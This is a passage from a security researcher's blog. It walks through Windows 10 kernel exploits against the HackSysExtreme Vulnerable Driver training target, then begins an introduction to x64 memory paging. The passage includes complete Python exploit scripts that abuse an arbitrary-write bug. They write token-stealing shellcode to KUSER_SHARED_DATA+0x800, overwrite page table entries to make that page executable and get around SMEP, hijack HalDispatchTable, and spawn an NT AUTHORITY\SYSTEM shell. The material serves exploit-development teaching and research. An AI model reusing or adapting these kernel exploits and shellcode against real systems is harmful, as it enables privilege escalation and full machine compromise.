shellcode_pte_control_bits_kernelmode = shellcode_pte_control_bits_usermode - 4

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(shellcode_pte_control_bits_kernelmode)

# Write-what-where structure #4
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = shellcode_pte
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Goodbye SMEP..."
print "[+] Overwriting shellcodes PTE user control bit with a supervisor control bit..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] User mode shellcode page is now a kernel mode page!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f1330

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Write-what-where structure #5
www = WriteWhatWhere()
www.What = addressof(shellcode_pointer)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM!

Rinse and Repeat

Did you think I forgot about you, kernel no-execute (NX)?

Let’s say that for some reason, you are against the method of allocating user mode code. There are many reasons for that, one of them being EDR hooking of crucial functions like VirtualAlloc().

Let’s say you want to take advantage of various defensive tools and their lack of visibility into kernel mode. How can we leverage already existing kernel mode memory in the same manner?

Okay, This Time We Are Going To The Mountain! KUSER_SHARED_DATA Time!

Morten in his research suggests that another suitable method may be to utilize the KUSER_SHARED_DATA structure in the kernel directly, similarily to how ROP works in user mode.

The concept of ROP in user mode is the idea that we have the ability to write shellcode to the stack, we just don’t have the ability to execute it. Using ROP, we can change the permissions of the stack to that of executable, and execute our shellcode from there.

The concept here is no different. We can write our shellcode to KUSER_SHARED_DATA+0x800, because it is a kernel mode page with writeable permissions.

Using our write and read primtives, we can then flip the NX bit (similar to ROP in user mode) and make the kernel mode memory executable!

The questions still remains, why KUSER_SHARED_DATA?

Static Electricity

Windows has slowly but surely dried up all of the static addresses used by exploit developers over the years. One of the last structures that many people used for kASLR bypasses, was the lack of randomization of the HAL heap. The HAL heap used to contain a pointer to the kernel AND be static, but no longer is static.

Although everything is dynamically based, there is still a structure that remains which is static, KUSER_SHARED_DATA.

This structure, according to Geoff Chappell, is used to define the layout of data that the kernel shares with user mode.

The issue is, this structure is static at the address 0xFFFFF78000000000!

What is even more interesting, is that KUSER_SHARED_DATA+0x800 seems to just be a code cave of non-executable kernel mode memory which is writeable!

How Do We Leverage This?

Our arbitrary write primitive only allows us to write one QWORD of data at a time (8 bytes). My thought process here is to:

  1. Break up the 67 byte shellcode into 8 byte pieces and compensate any odd numbering with NULL bytes.
  2. Write each line of shellcode to KUSER_SHARED_DATA+0x800, KUSER_SHARED_DATA+0x808,KUSER_SHARED_DATA+0x810, etc.
  3. Use the same read primitive to bypass page table randomization and obtain PTE control bits of KUSER_SHARED_DATA+0x800.
  4. Make KUSER_SHARED_DATA+0x800 executable by overwriting the PTE.
  5. NT AUTHORITY\SYSTEM

Before we begin, the steps about obtaining the contents of nt!MiGetPteAddress+0x13 and extracting the PTE control bits will be left out in this portion of the blog, as they have already been explained in the beginning of this post!

Moving on, let’s start with each line of shellcode.

For each line written the data type chosen was that of a c_ulonglong()- as it was easy to store into a c_void_p.

The first line of shellcode had an associated structure as shown below.

class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

Shellcode is declared as a c_ulonglong().

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

The shellcode is then written to KUSER_SHARED_DATA+0x800 through the previously created structure.

www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

This same process was repeated 9 times, until all of the shellcode was written.

As you can see in the image below, the shellcode was successfully written to KUSER_SHARED_DATA+0x800 due to the writeable PTE control bit of this structure.

Executable, Please!

Using the same arbitrary read primitives as earlier, we can extract the PTE control bits of KUSER_SHARED_DATA+0x800’s memory page. This time, however, instead of subtracting 4- we are going to use bitwise AND per Morten’s research.

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

We can see that dynamically, we can set KUSER_SHARED_DATA+0x800 to executable memory, giving us a nice big executable kernel memory region!

All that is left to do now, is overwrite the nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 and nt!KeQueryIntervalProfile() will take care of the rest!

This exploit can also be found on my GitHub, but here it is if you do not feel like heading over there:

# HackSysExtreme Vulnerable Driver Kernel Exploit (x64 Arbitrary Overwrite/SMEP Enabled)
# KUSER_SHARED_DATA + 0x800 overwrite
# Windows 10 RS1
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Defining KUSER_SHARED_DATA
KUSER_SHARED_DATA = 0xFFFFF78000000000

# First structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)
    ]

# Second structure, first 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_1(Structure):
    _fields_ = [
        ("What_Shellcode_1", c_void_p),
        ("Where_Shellcode_1", c_void_p)
    ]

# Third structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_2(Structure):
    _fields_ = [
        ("What_Shellcode_2", c_void_p),
        ("Where_Shellcode_2", c_void_p)
    ]

# Fourth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_3(Structure):
    _fields_ = [
        ("What_Shellcode_3", c_void_p),
        ("Where_Shellcode_3", c_void_p)
    ]

# Fifth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_4(Structure):
    _fields_ = [
        ("What_Shellcode_4", c_void_p),
        ("Where_Shellcode_4", c_void_p)
    ]

# Sixth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_5(Structure):
    _fields_ = [
        ("What_Shellcode_5", c_void_p),
        ("Where_Shellcode_5", c_void_p)
    ]

# Seventh structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_6(Structure):
    _fields_ = [
        ("What_Shellcode_6", c_void_p),
        ("Where_Shellcode_6", c_void_p)
    ]

# Eighth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_7(Structure):
    _fields_ = [
        ("What_Shellcode_7", c_void_p),
        ("Where_Shellcode_7", c_void_p)
    ]

# Ninth structure, next 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_8(Structure):
    _fields_ = [
        ("What_Shellcode_8", c_void_p),
        ("Where_Shellcode_8", c_void_p)
    ]

# Tenth structure, last 8 bytes of shellcode to be written to KUSER_SHARED_DATA + 0x800
class WriteWhatWhere_Shellcode_9(Structure):
    _fields_ = [
        ("What_Shellcode_9", c_void_p),
        ("Where_Shellcode_9", c_void_p)
    ]


# Eleventh structure, for obtaining the control bits for the PTE
class WriteWhatWhere_PTE_Control_Bits(Structure):
    _fields_ = [
        ("What_PTE_Control_Bits", c_void_p),
        ("Where_PTE_Control_Bits", c_void_p)
    ]

# Twelfth structure, to overwrite executable bit of KUSER_SHARED_DATA+0x800's PTE
class WriteWhatWhere_PTE_Overwrite(Structure):
    _fields_ = [
        ("What_PTE_Overwrite", c_void_p),
        ("Where_PTE_Overwrite", c_void_p)
    ]

# Thirteenth structure, to overwrite HalDispatchTable + 0x8 with KUSER_SHARED_DATA + 0x800
class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

"""
Token stealing payload

\x65\x48\x8B\x04\x25\x88\x01\x00\x00              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
\x48\x8B\x80\xB8\x00\x00\x00                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
\x48\x89\xC3                                      # mov rbx,rax         ; Copy current process to rbx
\x48\x8B\x9B\xF0\x02\x00\x00                      # mov rbx,[rbx+0x2f0] ; ActiveProcessLinks
\x48\x81\xEB\xF0\x02\x00\x00                      # sub rbx,0x2f0       ; Go back to current process
\x48\x8B\x8B\xE8\x02\x00\x00                      # mov rcx,[rbx+0x2e8] ; UniqueProcessId (PID)
\x48\x83\xF9\x04                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
\x75\xE5                                          # jnz 0x13            ; Loop until SYSTEM PID is found
\x48\x8B\x8B\x58\x03\x00\x00                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
\x80\xE1\xF0                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
\x48\x89\x88\x58\x03\x00\x00                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
\x48\x31\xC0                                      # xor rax,rax         ; set NTSTATUS SUCCESS
\xC3                                              # ret                 ; Done!
)
"""

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

# Print update for ntoskrnl.exe base address
print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Phase 1: Grab the base of the PTEs via nt!MiGetPteAddress

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x1b5f4

# Print update for nt!MiGetPteAddress address 
print "[+] nt!MiGetPteAddress is located at: {0}".format(hex(nt_mi_get_pte_address))

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

# Print update for nt!MiGetPteAddress+0x13 address
print "[+] nt!MiGetPteAddress+0x13 is located at: {0}".format(hex(pte_base))

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

# Getting handle to driver to return to DeviceIoControl() function
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_pointer,                       # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
base_of_ptes = struct.unpack('<Q', base_of_ptes_pointer)[0]

# Print update for PTE base
print "[+] Leaked base of PTEs!"
print "[+] Base of PTEs are located at: {0}".format(hex(base_of_ptes))

# Phase 2: Calculate KUSER_SHARED_DATA's PTE address

# Calculating the PTE for KUSER_SHARED_DATA + 0x800
kuser_shared_data_800_pte_address = KUSER_SHARED_DATA + 0x800 >> 9
kuser_shared_data_800_pte_address &= 0x7ffffffff8
kuser_shared_data_800_pte_address += base_of_ptes

# Print update for KUSER_SHARED_DATA + 0x800 PTE
print "[+] PTE for KUSER_SHARED_DATA + 0x800 is located at {0}".format(hex(kuser_shared_data_800_pte_address))

# Phase 3: Write shellcode to KUSER_SHARED_DATA + 0x800

# First 8 bytes

# Using just long long integer, because only writing opcodes.
first_shellcode = c_ulonglong(0x00018825048B4865)

# Write-what-where structure #2
www_shellcode_one = WriteWhatWhere_Shellcode_1()
www_shellcode_one.What_Shellcode_1 = addressof(first_shellcode)
www_shellcode_one.Where_Shellcode_1 = KUSER_SHARED_DATA + 0x800
www_shellcode_one_pointer = pointer(www_shellcode_one)

# Print update for shellcode
print "[+] Writing first 8 bytes of shellcode to KUSER_SHARED_DATA + 0x800..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_one_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
second_shellcode = c_ulonglong(0x000000B8808B4800)

# Write-what-where structure #3
www_shellcode_two = WriteWhatWhere_Shellcode_2()
www_shellcode_two.What_Shellcode_2 = addressof(second_shellcode)
www_shellcode_two.Where_Shellcode_2 = KUSER_SHARED_DATA + 0x808
www_shellcode_two_pointer = pointer(www_shellcode_two)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x808..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_two_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
third_shellcode = c_ulonglong(0x02F09B8B48C38948)

# Write-what-where structure #4
www_shellcode_three = WriteWhatWhere_Shellcode_3()
www_shellcode_three.What_Shellcode_3 = addressof(third_shellcode)
www_shellcode_three.Where_Shellcode_3 = KUSER_SHARED_DATA + 0x810
www_shellcode_three_pointer = pointer(www_shellcode_three)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x810..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_three_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fourth_shellcode = c_ulonglong(0x0002F0EB81480000)

# Write-what-where structure #5
www_shellcode_four = WriteWhatWhere_Shellcode_4()
www_shellcode_four.What_Shellcode_4 = addressof(fourth_shellcode)
www_shellcode_four.Where_Shellcode_4 = KUSER_SHARED_DATA + 0x818
www_shellcode_four_pointer = pointer(www_shellcode_four)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x818..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_four_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
fifth_shellcode = c_ulonglong(0x000002E88B8B4800)

# Write-what-where structure #6
www_shellcode_five = WriteWhatWhere_Shellcode_5()
www_shellcode_five.What_Shellcode_5 = addressof(fifth_shellcode)
www_shellcode_five.Where_Shellcode_5 = KUSER_SHARED_DATA + 0x820
www_shellcode_five_pointer = pointer(www_shellcode_five)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x820..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_five_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
sixth_shellcode = c_ulonglong(0x8B48E57504F98348)

# Write-what-where structure #7
www_shellcode_six = WriteWhatWhere_Shellcode_6()
www_shellcode_six.What_Shellcode_6 = addressof(sixth_shellcode)
www_shellcode_six.Where_Shellcode_6 = KUSER_SHARED_DATA + 0x828
www_shellcode_six_pointer = pointer(www_shellcode_six)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x828..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_six_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
seventh_shellcode = c_ulonglong(0xF0E180000003588B)

# Write-what-where structure #8
www_shellcode_seven = WriteWhatWhere_Shellcode_7()
www_shellcode_seven.What_Shellcode_7 = addressof(seventh_shellcode)
www_shellcode_seven.Where_Shellcode_7 = KUSER_SHARED_DATA + 0x830
www_shellcode_seven_pointer = pointer(www_shellcode_seven)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x830..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_seven_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Next 8 bytes
eighth_shellcode = c_ulonglong(0x4800000358888948)

# Write-what-where structure #9
www_shellcode_eight = WriteWhatWhere_Shellcode_8()
www_shellcode_eight.What_Shellcode_8 = addressof(eighth_shellcode)
www_shellcode_eight.Where_Shellcode_8 = KUSER_SHARED_DATA + 0x838
www_shellcode_eight_pointer = pointer(www_shellcode_eight)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x838..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_eight_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Last 8 bytes
ninth_shellcode = c_ulonglong(0x0000000000C3C031)

# Write-what-where structure #10
www_shellcode_nine = WriteWhatWhere_Shellcode_9()
www_shellcode_nine.What_Shellcode_9 = addressof(ninth_shellcode)
www_shellcode_nine.Where_Shellcode_9 = KUSER_SHARED_DATA + 0x840
www_shellcode_nine_pointer = pointer(www_shellcode_nine)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x840..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_nine_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Phase 3: Extract KUSER_SHARED_DATA + 0x800's PTE control bits

# Declaring C void pointer to stores PTE control bits
pte_bits_pointer = c_void_p()

# Write-what-where structure #11
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = kuser_shared_data_800_pte_address
www_pte_bits.Where_PTE_Control_Bits = addressof(pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# CTypes way of extracting value from a C void pointer
pte_control_bits_no_execute = struct.unpack('<Q', pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for KUSER_SHARED_DATA + 0x800: {:016x}".format(pte_control_bits_no_execute)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(pte_control_bits_execute)

# Write-what-where structure #12
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = kuser_shared_data_800_pte_address
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Overwriting KUSER_SHARED_DATA + 0x800's PTE..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Print update for PTE overwrite round 2
print "[+] KUSER_SHARED_DATA + 0x800 is now executable! See you later, SMEP!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f43b0

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Declaring KUSER_SHARED_DATA + 0x800 address again as a c_ulonglong to satisy c_void_p type from strucutre.
KUSER_SHARED_DATA_LONGLONG = c_ulonglong(0xFFFFF78000000800)

# Write-what-where structure #13
www = WriteWhatWhere()
www.What = addressof(KUSER_SHARED_DATA_LONGLONG)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.
ntdll.NtQueryIntervalProfile(
    0x1234,
    byref(c_ulonglong())
)

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")

NT AUTHORITY\SYSTEM x 2!

Final Thoughts

I really enjoyed this method of SMEP bypass! I also loved circumventing SMEP all together and bypassing NonPagedPoolNx via KUSER_SHARED_DATA+0x800 without the need for user mode memory!

I am always looking for new challenges and decided this would be a fun one!

If you would like to take a look at how SMEP can be bypassed via U/S bit corruption in C, here is this same exploit written in C (note- some offsets may be different).

As always, feel free to reach out to me with any questions, comments, or corrections! Until then!

Peace, love, and positivity! :-)

Turning the Pages: Introduction to Memory Paging on Windows 10 x64

26 April 2020 at 00:00

Introduction

0xFFFFFFFF11223344 is an example of a virtual memory address, and anyone who spends a lot of time inside of a debugger may be familiar with this notion. “Oh, that address is somewhere in memory and references X” may be an inference that is made about a virtual memory address. I always wondered where this address schema came from. It wasn’t until I started doing research into kernel mode mitigation bypasses that I realized learning where these virtual addresses originate from is a very important concept. This blog will by no means serve as a complete guide to virtual and physical memory in Windows, as it could EASILY be a multi series blog post. This blog is meant to serve as the prerequisite knowledge needed to do things like change permissions of a memory page in kernel mode with a vulnerability such as a write-what-where bug to bypass kernel mitigations such as SMEP or NonPagedPoolNx through page table entries.

Let’s dive into memory paging, and see where these virtual memory addresses originate from and what we can learn from these seemingly obscured 8 bytes we stubmle accross so copiously.

Firstly, before we begin, if you want a full fledged low level explanation of nearly every aspect of memory in Windows (which far surpasses the scope of this blog post) I HIGHLY suggest reading What Makes It Page?: The Windows 7 (x64) Virtual Memory Manager written by Enrico Martignetti. In addition to paging, we will look at some ways we can use WinDbg to automate some of the more admittedly cumbersome steps in the memory paging process.

Paging? ELI5?

Memory paging refers to the implementation of virtual memory by the MMU (memory management unit). Virtual memory is mapped to physical memory, known as RAM (and in some cases, actually to disk temporarily if physical memory needs to be optimized elsewhere).

One of the main reasons that memory paging is generally enabled, is the concept of “resource sharing”. For example, if we have two instances of the calc.exe- these two instances can share physical memory. Sharing physical memory is very important, as RAM is an expensive resource.

Take a look at the below image, from the Windows Internals, Part 1 (Developer Reference) 7th Edition book to get a better understanding visually of virtual to physical memory mapping.

In addition to this information, it is important to note that a physical memory page is generally 4 KB (2 MB and even 1 GB pages can be addressed, but that is beyond the scope of this blog) in size on x64 Windows. We will see how this comes to fruition in upcoming sections of this post.

Before diving straight in to some of the lower level details, it is important to note there are a few different “paging modes” that can be utilized. Paging modes refer to the way paging is executed. The paging mode we will be referring to and using (as is default on basically every x64 version of Windows) is Long-Mode Paging.

Are We There Yet?

If we want to understanding WHAT paging actually does, let’s take a look a moment and analyze how paging is actually enabled! Looking at some of the control registers will show us if/how paging is enabled and what paging mode are we using.

According to the Intel 64 and IA-32 Architectures Software Developer’s Manual, the CR0 register is responsible for paging being enabled.

CR0.PG refers to the 31st bit of the CR0 register. If this bit is set to 1, paging is enabled. If it is set to 0, paging is disabled.

The above image is from a default installation of Windows 10 x64, showing the 31st bit of the CR0 bit is set to 1.

We now know that paging is enabled based on the image above- but what kind of paging are we using? Referring again to the Intel manual, we notice that the CR4 control register is responsible for implementing the paging mode we are using.

As mentioned previously, the paging mode we are using is called Long-Mode Paging. Long-Mode Paging is another way of saying that Physical Address Extension, or PAE, is enabled. PAE enables 64-bit paging. If PAE was disabled, only 32-bit paging would be possible.

The 5th bit of the CR4 register is responsible for PAE being enabled. 1 = enabled, 0 = disabled.

We can also see, on a default installation of Windows 10 x64, PAE is enabled by default.

Now that we know how to identify IF and WHAT KIND of paging is enabled, let’s get into virtual to physical address translation!

Let’s Get Physical!

The easiest way to think about a virtual memory address, and where it comes from, is to look at it from a different perspective. Don’t take it at face value. Understanding what the virtual address is trying to accomplish, will surely shed some light on this whole process.

A virtual address is simply a computation of various indexes into several paging structures used to fetch the corresponding physical page to a virtual page.

Take a look at the image below, taken from the AMD64 Architecture Programmer’s Manual Volume 2.

Although this image above looks very intimidating, let’s break it down.

As we can see, the virtual address in this case is a 64-bit virtual address. The first portion of the address, bits 63-48, are represented as “Sign Extend”. Let’s leave this on the back burner for the time being.

We can see there are four paging structures in use:

  1. Page-Map Level-4 Table (PML4) (Bits 47-39)
  2. Page-Directory-Pointer Table (PDPT) (Bits 38-30)
  3. Page-Directory Table (PDT) (Bits 29-21)
  4. Page Table (PT) (Bits 20-12)

Each 8 bits of a virtual address (47-39, 38-30, 29-21, 20-12, 11-0) are actually just indexes of various paging structure tables.

In addition, each paging structure table contains 512 page table entries (PxE).

So in totality, each paging structure is really a table with 512 entries each.

